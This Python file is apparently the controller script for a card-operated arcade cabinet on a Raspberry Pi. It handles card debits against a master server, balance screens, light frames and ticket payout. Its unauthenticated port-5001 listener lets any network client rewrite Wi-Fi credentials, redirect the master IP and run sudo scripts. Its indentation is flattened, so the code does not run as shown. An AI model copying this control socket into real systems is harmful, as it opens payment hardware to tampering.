global MiMac
global PantallaPago
global confirmacion
global ctk
global tarjeta
global PagandoTk
global HTimeOut
global TerminoOperacion
global DosMundosc
global lcolor1
global lcolor2
global lcolor3
global xa
global jluces
global apb
global ColorVerde
global ColorRojo
global NumMaq
global IP
global PUERTO
global PV
global PN
NumMaq='XXXX'
IP='10.0.0.2'
PUERTO='5000'
MiIp='000.000.000.000'
MiMac='00:00:00:00:00:00'
LabelPase='SWIPE YOUR CARD'
LabelPagando='Paying Tks'
LabelPago='You Win'
PN='-'
PV='-'
confirmacionMudo=True
#sock.settimeout(1.0)
ConfirmacionTarjeta=False
tarjetalista=0
TerminoOperacion=1
PantallaPago=0
apb=0
jluces=0
xa=0
pygame.mixer.init()
SinNada=True
HTimeOut=datetime.now()
acumulador=''
qcolor=0
PagandoTk=False
TimeOut=False
tarjeta=''
DosMundosc=0
controlluces=0
#------ "Dos Mundos" light frame definitions ------
M1=[0x25,0X49,0x24,0X97,0x49,0x24,0x97]
M0=[0x26]
M2=[0x25,0x49,0x24,0x92,0xE9,0x24,0x97]
M3=[0x25,0x49,0x24,0x92,0x5D,0x24,0x97]
M4=[0x25,0x49,0x24,0x92,0x4B,0xA4,0x97]
M5=[0x25,0x49,0x24,0x92,0x49,0x74,0x97]
M6=[0x25,0x49,0x24,0x92,0x49,0x2E,0x97]
M7=[0x25,0x49,0x24,0x92,0x49,0x25,0xD7]
M8=[0x25,0x49,0x24,0x92,0x49,0x24,0xBF]
M9=[0x25,0x49,0x24,0x92,0x49,0x24,0x97]
M10=[0x25,0x49,0x24,0x97,0x49,0x24,0x92]
M11=[0x25,0x00,0x00,0x00,0x00,0x00,0x07]
rojo_dos_mundos=bytearray(M1)
rojo_dos_mundos1=bytearray(M2)
rojo_dos_mundos2=bytearray(M3)
rojo_dos_mundos3=bytearray(M4)
rojo_dos_mundos4=bytearray(M5)
rojo_dos_mundos5=bytearray(M6)
rojo_dos_mundos6=bytearray(M7)
rojo_dos_mundos7=bytearray(M8)
rojo_dos_mundos8=bytearray(M9)
rojo_dos_mundos9=bytearray(M10)
blanco_giro=bytearray(M11)
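# Frame format note (inferred, not in the original): each frame is one opcode
# byte (0x24/0x25/0x26...) plus six data bytes, i.e. 48 bits; the repeating
# 0b100100100 patterns (0x49, 0x24, 0x92) set every third bit, which is
# consistent with driving one colour channel per RGB LED on the cabinet.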
os.system('setterm -cursor off')
#------------------------------
# QR helper (2018)
def saveQRCodePNG(Nombre,Tam,Que):
try:
os.remove(Nombre+".png")
except:
b=1
fullfilename = "/home/pi/"+Nombre
objectQRCode = pyqrcode.create(Que)
with open(fullfilename + ".png", 'wb') as fstream:
objectQRCode.png(fstream, scale=Tam)
# same as above
objectQRCode.png(fullfilename + ".png", scale=Tam)
# in-memory stream is also supported
buffer = io.BytesIO()
objectQRCode.png(buffer)
# do whatever you want with buffer.getvalue()
print("Qr Creado Ok")
#
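# Example call (not in the original; filename and scale are illustrative):
# saveQRCodePNG("MyIp", 8, "http://" + MiIp + ":5000")
# writes /home/pi/MyIp.png with the URL encoded at module scale 8.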
def listen():
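    # Command summary (inferred from the handlers below, not in the original):
    # "300..."         remote card swipe: re-arms the reader and queues the card
    # "NumXXXX"        store a new machine number in num.mc
    # "SSID:"/"PASS:"  write Wi-Fi credentials and reconfigure the network
    # "log"            report MAC, IP, temperature, master IP, number and prices
    # "master<ip>"     change the master server IP
    # "wifi"/"hotspot" switch between client and hotspot modes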
global PN
global PV
global IP
global NumMaq
global tarjeta
global controlluces
global EnvioPuerto
global ConfirmacionTarjeta
global punto
WIFIN=''
WIFIP=''
try:
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
connection.bind(("", 5001))
connection.listen(1)
print('abre listen')
# listen()
# return
cpu=CPUTemperature()
while True:
current_connection, address = connection.accept()
while True:
data = current_connection.recv(66)
if data:
#current_connection.send(data)
traje=data.decode('utf8')
print(traje)
EnvioNo=''
if traje[:3]=='300':
controlluces=0
EnvioPuerto=''
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#tarjeta=traje[7:21]+'?'
print('llego 300 ' + str(tarjeta))
EnvioNo='103'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#time.sleep(0.8)
punto=1
tarjeta=traje[7:21]+'?'
if traje[:3]=='Num':
time.sleep(0.3)
NumMaq=traje[3:7]
EnvioNo='NumMaq Changed OK to '+str(NumMaq)
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
try:
os.remove('/home/pi/ControllerConfig/num.mc')
print('archivo num borrado ok')
file=open('num.mc','w')
file.write(NumMaq)
file.close()
print('archivo num creado ok')
except:
file=open('/home/pi/ControllerConfig/num.mc','w')
file.write(NumMaq)
file.close()
print('archivo num creado ok')
time.sleep(3.0)
if traje[:5]=='SSID:':
WIFIN=traje[5:]
EnvioNo='SSID OK \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
if WIFIP=='':
EnvioNo='Enter password for network '+ str(WIFIN) + '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
if traje[:5]=='PASS:':
if WIFIN=='':
EnvioNo='Write a valid SSID Network before Password \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
break
WIFIP=traje[5:]
EnvioNo='Password for '+ str(WIFIN) +' OK \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
try:
file=open("/home/pi/ControllerConfig/red.mc",'w')
file.write('ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\r\n')
file.write('update_config=1\r\n')
file.write('country=AR\r\n')
file.write('\r\n')
file.write('network={\r\n')
file.write(' ssid="'+ str(WIFIN) +'"\r\n')
file.write(' psk="'+ str(WIFIP) +'"\r\n')
file.write(' key_mgmt=WPA-PSK\r\n')
file.write('}')
file.close()
except:
EnvioNo='Error to configure Wifi Network, please press reset button ... \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
break
while os.path.getsize("/home/pi/ControllerConfig/red.mc")==0:
time.sleep(0.5)
print('esperando q se guarde')
EnvioNo='Please Wait, Restarting Controller ... \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(1.5)
#ejecuta comando de configuracion wifi - Eze.C 2018
try:
os.remove("hotspoton.mc")
except:
b=1
os.system("sudo python3 /home/pi/ControllerConfig/configw.py -f")
if traje[:3]=='log':
EnvioNo='Controller: My Mac is '+str(MiMac)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: My Ip is '+str(MiIp)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: My Temperature is '+str(cpu.temperature)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Master Ip is '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: MaqNumber is '+str(NumMaq)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Normal Price is '+str(PN)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Vip Price is '+str(PV)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#time.sleep(10.0)
#return
elif traje[:8]=='masterip':
EnvioNo='Controller: Master Ip is '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#IP=traje[6:]
#print(str(IP))
#EnvioNo='Controller: Master IP Changed OK to '+str(IP)
#current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(5.0)
#return
elif traje[:6]=='master':
EnvioNo='Controller: Prev Ip '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
IP=traje[6:]
print(str(IP))
EnvioNo='Controller: Master IP Changed OK to '+str(IP) + '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(5.0)
#return
elif traje[:4]=='wifi':
EnvioNo='Preparando Conexion Wifi...'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
os.system("sudo python3 /home/pi/ControllerConfig/configw.py -f")
#current_connection.close()
elif traje[:7]=='hotspot':
EnvioNo='Preparando Hotspot Wifi...'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
file=open("hotspoton.mc","w")
file.close()
os.system("sudo python3 /home/pi/ControllerConfig/configh.py -f")
#current_connection.close()
elif traje[0:17]==MiMac:
print('entro')
NumMaq=traje[21:25]
PN=traje[25:32]
PV=traje[32:39]
PantFull()
EnvioNo='103'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
else:
EnvioNo=str(ObtenerMac('wlan0'))
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(3.00)
if EnvioNo!='':
current_connection.close()
break
except:
print('NO abre listen')
def ObtenerMac(interface='eth0'):
global MiIp
global MiMac
# Return the MAC address of the specified interface
try:
str = open('/sys/class/net/%s/address' %interface).read()
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
MiIp=ipaddr
gateway = gw[2]
host = socket.gethostname()
MiMac=str[0:17]
msj=subprocess.check_output("hostname -I",shell=True).decode('utf8')
MiIp=msj.strip()
return MiIp#str[0:17]+ ','+ ipaddr + ','+ NumMaq
except:
msj=subprocess.check_output("hostname -I",shell=True).decode('utf8')
MiIp=msj.strip()
str = "00:00:00:00:00:00"
return 'NO'#str[0:17]+ ','+ ipaddr + ','+ NumMaq
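# Usage note (not in the original): ObtenerMac('wlan0') reads the MAC from
# /sys/class/net/wlan0/address, finds the default gateway via
# `ip -4 route show default`, and returns the address reported by `hostname -I`;
# on failure it still refreshes MiIp and returns 'NO'.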
def Debitar():
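    # Protocol notes (inferred from the code below, not in the original):
    # the controller sends "MAC,IP,MaqNum*<card><normal><vip>99" to the master
    # on port 5000 and parses a fixed-width reply: byte [1] is the status
    # ('0' = no balance, '1' = credit OK), [10:14] the ticket count and
    # [14:-2] the message shown on screen; replies shorter than 46 bytes are
    # treated as invalid transactions.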
global tarjeta
global NumMaq
global balance
global EnvioPuerto
global UltTar
global controlluces
global tarjetalista
global TerminoOperacion
global confirmacion
global ConfirmacionCoin
global ConfirmacionTarjeta
global LabelPase
global LabelPagando
global LabelPago
global confirmacionMudo
ConfirmacionCoin=0
ConfirmacionTarjeta=False
print('llego con tarjeta '+str(tarjeta))
if tarjeta !='':# and TerminoOperacion==1:
#print(tarjeta)
tarjeta2018=tarjeta
print(tarjeta2018)
balance=''
try:
# Create a TCP/IP socket
print('previo a conectar')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (str(IP),5000)#192.168.2.50 -- IAAPA
print('connecting to %s port %s' % server_address)
sock.settimeout(5.0)
sock.connect(server_address)
message = MiMac+','+MiIp+','+NumMaq +'*'+tarjeta2018[:-1] + str(PN) + str(PV) + '99' #tarjeta.get() #'C;1921000005618'
# Connect the socket to the port where the server is listening
print('paso conexion')
# Send data
#message = NumMaq +'*'+tarjeta[:-1] + '1.00 1.00 99' #tarjeta.get() #'C;1921000005618'
#print('sending "%s"' % message)
#sock.settimeout(1.0)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
# Look for the response
#amount_received = 0
#amount_expected = 1#len(message)
data1=''
data=''
#yat=datetime.now()
#hastat=datetime.now()+timedelta(milliseconds=2000)
#amount_received < amount_expected and
print('antes de leer')
while data=='':#hastat > yat and data=='':
data = sock.recv(48)
#print(data)
#amount_received += len(data)
#encoded
#data_string = json.dumps(data.decode('utf8'))
#Decoded
#decoded = json.loads("{'credito': '75.1'}")
print('leyo')
data1=data.decode('utf8')
print(str(data1))
print("paseeee----")
#sock.close()
##print(data1.lstrip("{"))
if len(data1)<46:
#Saldo.config(text ="New card")
#bonus.config(text ="")
#tk.config(text ="")
balance='Invalid Transaction'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
label = myfont.render("Network Error", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
luz2017('rojo')
time.sleep(1)
#break
elif data1[1:2]=='0':#data1=='sin' or data1=='SIN':
#Saldo.config(text ="New card")
#bonus.config(text ="")
#tk.config(text ="")
print("Entro a sin saldo")
#while tarjetalista==0:
# b=1
#balance='[Recharge for Play Again]'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
balance=data1[14:-2].lstrip()
print(data1)
esto=balance#data#str(tarjeta)+str(' Ok')
esto1=balance#[2:].lstrip()
esto1=esto1.rstrip()
print(esto1)
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
if esto1[:5]=='Saldo':# or esto[1:6]=='Saldo':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win!!!'
print(esto+' Eze')
if esto1[:5]=='Saldo':# or esto[1:6]=='Saldo':
label = myfont.render("SIN SALDO ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
elif esto[:2]=='Su':
label = myfont.render("SIN SALDO ", 1, (255,255,255))
linea1=esto[:15].lstrip()
linea2=esto[15:].lstrip()
else:
label = myfont.render("NO BALANCE ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
linea3='Tickets: '+ str(int(data1[10:14]))
#if len(linea1)<20:
# while len(linea1)<20:
# linea1=linea1 + ' '
if len(linea2)<len(linea1):
while len(linea2)<len(linea1):
linea2=linea2 + ' '
if len(linea3)<len(linea1):
while len(linea3)<len(linea1):
linea3=linea3 + ' '
#pygame.event.wait()
#while pygame.mixer.music.get_busy():
#print("Playing...")
#time.sleep(500)
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-115))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea1, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-30))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea2, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+15))
#print(esto[1:3])
if esto[:2]=='Su':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win !!!'
if esto[:4].lstrip() !='Card' and esto[:2].lstrip()!='Su' and esto[:3]!='Hay' and esto[:7].lstrip()!='Tarjeta':
myfont =pygame.font.Font("super.ttf",30)
label2 = myfont.render(linea3, 1, (0,255,0))
screen.blit(label2,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+60))
pygame.display.flip()
pygame.display.update()
#while EnvioPuerto!='':
# b=1
#luz2017('rojo')
#ColorRojo
serie.flush()
EnvioPuerto=''
#time.sleep(.200)
EnvioPuerto=''
#while tarjetalista==0:
# b=1
#serie.write(bytes(bytearray([0x25,0x49,0x24,0x92,0x49,0x24,0x97])))
#tarjetalista=0
#serie.flush()
#EnvioPuerto=''#ColorRojo
#serie.flushOutput()
#sock.sendall(str(ColorRojo))
#time.sleep(.200)
if len(data1)>46:
#sock.connect(server_address)
balance=data1
mok='103'
sock.sendall(mok.encode(encoding='UTF-8',errors='ignore'))
#confirmacion=False
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3C]))
time.sleep(0.150)
#pygame.mixer.music.load('/home/pi/Desktop/rojo.mp3')
#pygame.mixer.music.play()
controlluces=0
while controlluces==0:
serie.write(bytes(ColorRojo))
time.sleep(1.100)
#time.sleep(1)
#os.system("omxplayer -b /home/pi/Desktop/rojo.mp3")
#time.sleep(1.00)
#while confirmacion==False:
# b=1
#tarjetalista=0
elif data1[1:2]=='1':#len(data1)>10:
UltTar=tarjeta2018
print("Entro con saldo")
ee=bytearray()
ee.append(0x2A)
ee.append(0x92)
ee.append(0x49)
ee.append(0x24)
ee.append(0x92)
ee.append(0x49)
ee.append(0x27)
serie.flush()
EnvioPuerto=''
#while tarjetalista==0:
# print('esperando tarjetalista')
# b=1
print('ya')
print(data1)
balance=data1[14:-2].lstrip()
print(balance)
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
#print(esto[1:6])
if esto[:5]=='Saldo':# or esto[1:6]=='Saldo':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win!!!'
#print(str(esto[2:7]))
if esto[:5]=='Saldo':# or esto[1:6]=='Saldo':
label = myfont.render("JUEGUE!!! ", 1, (255,255,255))
else:
label = myfont.render("PLAYER OK ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
linea3='Tickets: '+ str(int(data1[10:14]))
#if len(linea1)<20:
# while len(linea1)<20:
# linea1=linea1 + ' '
if len(linea2)<len(linea1):
while len(linea2)<len(linea1):
linea2=linea2 + ' '
if len(linea3)<len(linea1):
while len(linea3)<len(linea1):
linea3=linea3 + ' '
#time.sleep(300)
#clock.tick(100)
#confirmacionMudo=False
#while confirmacionMudo==False:
serie.flush()
#serie.write(bytes([0x3A]))
#time.sleep(0.100)
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-115))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea1, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-30))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea2, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+15))
myfont =pygame.font.Font("super.ttf",30)
label2 = myfont.render(linea3, 1, (0,255,0))
screen.blit(label2,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+60))
pygame.display.flip()
pygame.display.update()
#time.sleep(.030)
#time.sleep(1)
#luz2017('verde')
#while EnvioPuerto!='':
# b=1
#confirmacion=True
#EnviarPuerto=ee
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3C]))
time.sleep(0.100)
#pygame.mixer.music.load('/home/pi/Desktop/verde1.mp3')
#pygame.mixer.music.play()
print("Playing...")
if len(data1)>46:
#sock.connect(server_address)
mok='103'
sock.sendall(mok.encode(encoding='UTF-8',errors='ignore'))
ConfirmacionCoin=0
while ConfirmacionCoin==0:
print("EnviandoCoin")
serie.write(bytes(ee))
time.sleep(1.1)
#os.system("omxplayer -b /home/pi/Desktop/verde1.mp3")
#time.sleep(1)
balance=data1
tarjetalista=0
time.sleep(0.1)
##print(python_obj[4]["credito"])
##print(python_obj[5]["bonus"])
##print(python_obj[6]["tk"])
#pets = set(data_string)
##print(json.dumps(pets, default=jdefault))
#esto=decoded
#print ("Tenemos "+ decoded["credito"])
#esto=json.dumps(data_string, default=jdefault)#str(decoded['credito'])
##print('received "%s"' % esto)
# Saldo.text=
except:
print('error al conectar')
serie.write(bytearray(bytes([0x25,0x6D,0xB6,0xDB,0x6D,0xB6,0xDF])))
balance='Network Error'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
label = myfont.render("Network Error", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
#luz2017('rojo')
time.sleep(1)
#sock.close()
#Debitar()
#return
b=1
finally:
#tarjeta=''
#punto=0
print('closing socket')
sock.close()
time.sleep(1.0)
#EnvioPuerto=activot
#TerminoOperacion=1
PantFull()
EnvioPuerto=''
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#EnvioPuerto=''
#serie.flush()
#while confirmacion==False:
#time.sleep(0.010)
#controlluces=0
#while controlluces==0:
#serie.write(bytearray([0x25,0x09,0x00,0x09,0x00,0x49,0xF8]))#bytearray([0x28,0x10,0x11,0x01,0x02,0x05,0x09])#bytes(a)
#time.sleep(1.00)
#time.sleep(1.00)
#serie.flush()#Ouput()
#time.sleep(1)
#serie.flush()#Ouput()
#time.sleep(.030)
#serie.write(bytes(activot))
#time.sleep(.020)
tarjetalista=0
haytarjeta=0
punto=0
controlluces=1
TerminoOperacion=1
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3A]))
time.sleep(0.150)
print("termino")
#serie.flush()
#confirmacion=False
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
#luz2017('paseo')
#time.sleep(1)
#time.sleep(0.030)
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#serie.write(EnvioPuerto1)
#'else:
#' Saldo.config(text = 'Sin tarjeta...')
def DosMundos():
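    # Steps the "Dos Mundos" cabinet lights one frame per call while
    # controlluces == 1: DosMundosc cycles 0..10 through the rojo_dos_mundos*
    # frames and finishes with the white spin frame before wrapping around.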
global confirmacion
global DosMundosc
print('entro dos mundos '+str(controlluces))
#if len(tarjeta)==0:
if DosMundosc==0 and controlluces==1:
serie.write(bytes(rojo_dos_mundos))
DosMundosc=1
return
#confirmacion=False
if DosMundosc==1 and controlluces==1:
serie.write(bytes(rojo_dos_mundos1))
DosMundosc=2
return
#confirmacion=False
if DosMundosc==2 and controlluces==1:
serie.write(bytes(rojo_dos_mundos2))
DosMundosc=3
return
#confirmacion=False
if DosMundosc==3 and controlluces==1:
serie.write(bytes(rojo_dos_mundos3))
DosMundosc=4
return
#confirmacion=False
if DosMundosc==4 and controlluces==1:
serie.write(bytes(rojo_dos_mundos4))
DosMundosc=5
return
#confirmacion=False
if DosMundosc==5 and controlluces==1:
serie.write(bytes(rojo_dos_mundos5))
DosMundosc=6
return
#confirmacion=False
if DosMundosc==6 and controlluces==1:
serie.write(bytes(rojo_dos_mundos6))
DosMundosc=7
return
#confirmacion=False
if DosMundosc==7 and controlluces==1:
serie.write(bytes(rojo_dos_mundos7))
DosMundosc=8
return
#confirmacion=False
if DosMundosc==8 and controlluces==1:
serie.write(bytes(rojo_dos_mundos8))
DosMundosc=9
return
#confirmacion=False
if DosMundosc==9 and controlluces==1:
serie.write(bytes(rojo_dos_mundos9))
DosMundosc=10
return
#confirmacion=False
if DosMundosc==10 and controlluces==1:
serie.write(bytes(blanco_giro))
DosMundosc=0
return
#confirmacion=False
def inicio():
global confirmacion
global ctk
global tarjeta
global PagandoTk
global TimeOut
global EnvioPuerto
global punto
global ColorVerde
global ColorRojo
global UltTar
TimeOut=False
PagandoT=False
tarjeta=''
ctk=0
xa=0
punto=0
confirmacion=True
global llego1
llego1=''
EnvioPuerto=''
UltTar=''
pygame.init()
pygame.font.init()
ColorVerde=bytearray()#[0x25,0x92,0x49,0x24,0x92,0x49,0x27])#bytes(a)
ColorVerde.append(0x25)
ColorVerde.append(0x92)
ColorVerde.append(0x49)
ColorVerde.append(0x24)
ColorVerde.append(0x92)
ColorVerde.append(0x49)
ColorVerde.append(0x27)
ColorRojo=bytearray()#([0x25,0x49,0x24,0x92,0x49,0x24,0x97])#bytes(a)
ColorRojo.append(0x25)
ColorRojo.append(0x49)
ColorRojo.append(0x24)
ColorRojo.append(0x92)
ColorRojo.append(0x49)
ColorRojo.append(0x24)
ColorRojo.append(0x97)
inicio()
def TiempoTk():
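    # Watchdog (an endless polling loop, not in the original comments): once
    # tickets are pending (ctk > 0) and no payout is in progress, it keeps
    # refreshing Ahora and raises TimeOut when the HTimeOut deadline passes.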
global ctk
global TimeOut
global EntrarTimer
#global HTimeOut
global Ahora
global EnvioPuerto
EntrarTimer=False
TimeOut=False
while True:
#if int(ctk)>0:
###print(PagandoTk)
###print(ctk)
###print(SinNada)
#Ahora=datetime.now()
if PagandoTk==False and int(ctk)>0:
Ahora=datetime.now()
#if TimeOut==False:
# TimeOut=False
if Ahora >= HTimeOut and TimeOut==False:
if PagandoTk==False and int(ctk)>0:
TimeOut=True
####print('Termino tiempo de Tk')
####print('Envia Tks')
####print(ctk)
#if confirmacion==True:
# serie.write(activot)
#while len(EnvioPuerto)>0:
# a=1
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=activot
#if Ahora < HTimeOut:
# Timeout=False
def resize_image(event):
new_width = event.width
new_height = event.height
image = copy_of_image.resize((new_width, new_height))
photo = ImageTk.PhotoImage(image)
label.config(image = photo)
label.image = photo #avoid garbage collection
def cargo():
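    # Resets the card-query flags for a fresh read cycle.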
#global confirmacion
global termineConsulta
global estatarjeta
termineConsulta=False
estatarjeta=False
confirmacion=True
    #[0x29,0x10] -> slow payout pulses
    #[0x29,0x22] -> fast payout pulses
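# Serial protocol to the LED/payout board, as used below (inferred from this
# file, not from a datasheet): 0x24/0x25/0x28 start 7-byte LED frames, 0x26
# enables the card reader, 0x27 disables it, 0x29 sets the payout pulse
# speed, 0x30 the payout mode, and 0x3A mutes the board. Single-byte replies
# ('U','T','X','Y','Z','V') acknowledge commands; see EscuchoPuerto().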
serie = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
#seriet = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
activot=bytearray()#([0x26])#,0x00,0x00,0x00,0x00,0x00,0x00])
activot.append(0x26)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
desactivot=bytearray()#([0x27])#,0x00,0x00,0x00,0x00,0x00,0x00])
desactivot.append(0x27)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
pcorto=bytearray()#[0x29,0x10])#,0x00,0x00,0x00,0x00,0x00])# fast payout - fast coin pulses
pcorto.append(0x29)
pcorto.append(0x10)
serie.write(pcorto)
serie.flushOutput()
time.sleep(1)
pcorto1=bytearray()#[0x30,0x01,0x35])#,0x00,0x00,0x00,0x00]) # enables payout
pcorto1.append(0x30)
pcorto1.append(0x01)
pcorto1.append(0x27)# 35 electronic // 60 physical
# pcorto.append(0x10)
serie.write(pcorto1)
serie.flushOutput()
time.sleep(1)
serie.write(activot)
serie.flushOutput()
time.sleep(1)
rojo=bytearray()
rojo.append(0x24)
rojo.append(0x92)
rojo.append(0x49)
rojo.append(0x24)
rojo.append(0x92)
rojo.append(0x49)
rojo.append(0x27)
rojo1=bytearray()
rojo1.append(0x24)
rojo1.append(0x49)
rojo1.append(0x24)
rojo1.append(0x92)
rojo1.append(0x49)
rojo1.append(0x27)
rojo1.append(0x92)
rojo2=bytearray()
rojo2.append(0x24)
rojo2.append(0x24)
rojo2.append(0x92)
rojo2.append(0x49)
rojo2.append(0x27)
rojo2.append(0x92)
rojo2.append(0x49)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
verde=bytearray()
verde.append(0x24)
verde.append(0x80)
verde.append(0x00)
verde.append(0x00)
verde.append(0x80)
verde.append(0x00)
verde.append(0x00)
verde1=bytearray()
verde1.append(0x24)
verde1.append(0x10)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde1.append(0x00)
verde2=bytearray()
verde2.append(0x24)
verde2.append(0x02)
